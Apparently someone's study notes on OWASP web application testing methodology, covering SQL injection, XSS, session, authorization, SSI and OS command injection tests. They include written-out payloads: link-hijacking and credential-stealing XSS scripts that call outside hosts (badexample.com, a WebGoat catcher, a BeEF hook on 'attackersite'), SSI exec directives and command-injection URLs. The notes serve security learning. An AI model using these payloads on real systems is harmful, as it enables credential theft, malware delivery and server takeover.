Vous êtes sur la page 1sur 5

USING TESTING GUIDE: GO TO PG:47 look fr the control and Ctrl+f the Ref number Owasp Testing Methodology:

Before Development: 1.Policy review 2.standards review Defenition and Design 1.Requ revi 2.Design and uml models reviw 3.Arcitecture review 4.Create and review the threrat models Development 1.Code walkthroughs 2.Code review and 3.Unit and sys test Maintenance 1.Change Verification 2.Health Checks 3.Operational mgmt review 4.Regression tests Two modes : 1.Passive 2.Active - Under active we have all the below tests We have split the set of active tests in 9 sub-categories for a total of 66 cont rols: Configuration Management Testing Business Logic Testing Authentication Testing Authorization testing Session Management Testing Data Validation Testing Denial of Service Testing Web Services Testing Ajax Testing For the above tests we use specific tools . Black box testing: Analyze robots.txt using Google Webmaster Tools iste site:____ and intest____ to identify sites n resources cache:______ gives the chached version of the site Grey Box: Analyze entry points Look into the post and get methods used Use fiddler fr analysing the requests

SQL INJECTION: Three types Inband out of band inferential Steps: 1.Adding a semi colon or single quote

2.If we get a normal 500 server erroe that means blind sql is in order 3.Check each field seperately 4.Check for comment out specification 5.Try changing paranthesis specifications 6.Some query checks if only one tuple is returned fr that use LIMIT 1 end of the payload 7.use %20 fr all spaces 8.Try using order by and getting the number of columns 9.Then try union all 10. For blind use SUBSTRING (text, start, length) , ASCII (char) and LENGTH (tex t) 11.LOAD FILE to add file contents to the SQL query XSS: From the response find the script in use either it'll be JavaScript , ActionScript and VBScript. use CAL9000 to find out type of encoding like %3cscript%3e Script to dwonload malicios .exe file <script>window.onload = function() {var AllLinks=document.getElementsByTagName("a"); AllLinks[0].href = "http://badexample.com/malicious.exe"; }</script> use for REDIRECTION : <script>alert(document.cookie)</script> use window.location="www.1.com" window.navigation(""); FOR Phishing use: <script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value); XSSImage=new Image; XSSImage.src="http://localho st/WebGoat/catcher?PROPERTY=yes&user="+ document.forms[0].user.value + "&passwor d=" + document.forms[0].pass.value + "";} </script><form><br><br><HR><H3>This fe ature requires account login:</H3 ><br><br>Enter Username:<br><input type="text" id="user" name="user"><br>Enter Password:<br><input type="password" name = "pas s"><br><input type="submit" name="login" value="login" onclick="hack()"></form>< br><br><HR> Log Spoofing: Smith%0d%0aLogin Succeeded for username: admin XSS browser exploitation framework (BeEF) <script src=http://attackersite/beef/hook/beefmagic.js.php></script> HTTP ONLY attribute in session adds to the security HTTP POST request for file upload: POST /fileupload.aspx HTTP/1.1 [ ] Content-Disposition: form-data; name="uploadfile1"; filename="C:\Documents and Settings\test\Desktop\test.txt" Content-Type: text/plain test HTTP POST Request forged: Content-Disposition: form-data; name="uploadfile1"; filename="C:\Documents and Settings\test\Desktop\test.gif" Content-Type: text/html <script>alert(document.cookie)</script>

some special variables and functions to look at when analyzing source code: FOR PHP: $_GET - HTTP GET variables $_POST - HTTP POST variables $_FILES - HTTP File Upload variables For ASP Request.QueryString - HTTP GET Request.Form - HTTP POST Server.CreateObject - used to upload files For JSP doGet, doPost servlets HTTP GET and POST request.getParameter - HTTP GET/POST variables SSLtesting: SSL encrpts resp and req . And aso provide digi cert fr authenticating servers n sometime even clients HTTPS can run on non std ports Nessus can report eak ciphers in SSL Check certificates- Domain names might nt match in certificate Infrastructure and Application Admin Interfaces: Use dirbuster and get directories See source code fr links in comment Review Server config to see admin user page n server creds Try alternate server port tamper the GET and Post req Credentials Brute forcing: 3 types: Dictionary Serach Rule based search Brutus can be use to carry out the attacks Bypassing authentication: Direct page request (forced browsing) Parameter Modification Session ID Prediction SQL Injection Testing for logout see if cache has some info see if session is completely gone try going forwad and backward

Testing for race conditions: Concurrency in accounts concurrency in cart etc For sessions: See if sessions are weak see for fixation see for tags like httponly- saves cookie from goin out secure- encrypted tunnel fr sensitive data domain-same origin policy path expires Authorization testing: path traversal using ..// forced browsing test for csrf Testing fro xss: use cal9000 for testing char encoding stored xss can be exploited further with BeEF LDAP injection: check by inserting '(', '|', '&', '*' in the ldapsearch field ORM injection: Objection relational mapping tool is used to map db objects to protect from DOR XML injection: test with adding ' " < > <!-- & CDATA(google fr its format) in the field Server Side Includes(SSI) Will be On if shtml is used . It does certain server parsing before a page is loaded. it can be exploited and we can even gain remore access to the server. command example: <!--#include virtual="/footer.html" --> to include the content of a file. <!--#exec cmd="ls" --> The injection can be performed also in HTTP headers GET / HTTP/1.0 Referer: <!--#exec cmd="/bin/ps ax"--> User-Agent: <!--#virtual include="/proc/version"--> SSI directives: < ! # = / . " - > and [a-zA-Z0-9] Xpath injection: -----OS command injection: Example URL before alteration: http://sensitive/cgi-bin/userData.pl?doc=user1.txt Example URL modified: http://sensitive/cgi-bin/userData.pl?doc=/bin/ls| This will execute the command /bin/ls Use semi colon after that for a .php page In post method as: Authorization: Basic T2Vbc1Q9Z3V2Tc3e=

Content-Type: application/x-www-form-urlencoded Content-length: 33 Doc=Doc1.pdf+|+Dir c:\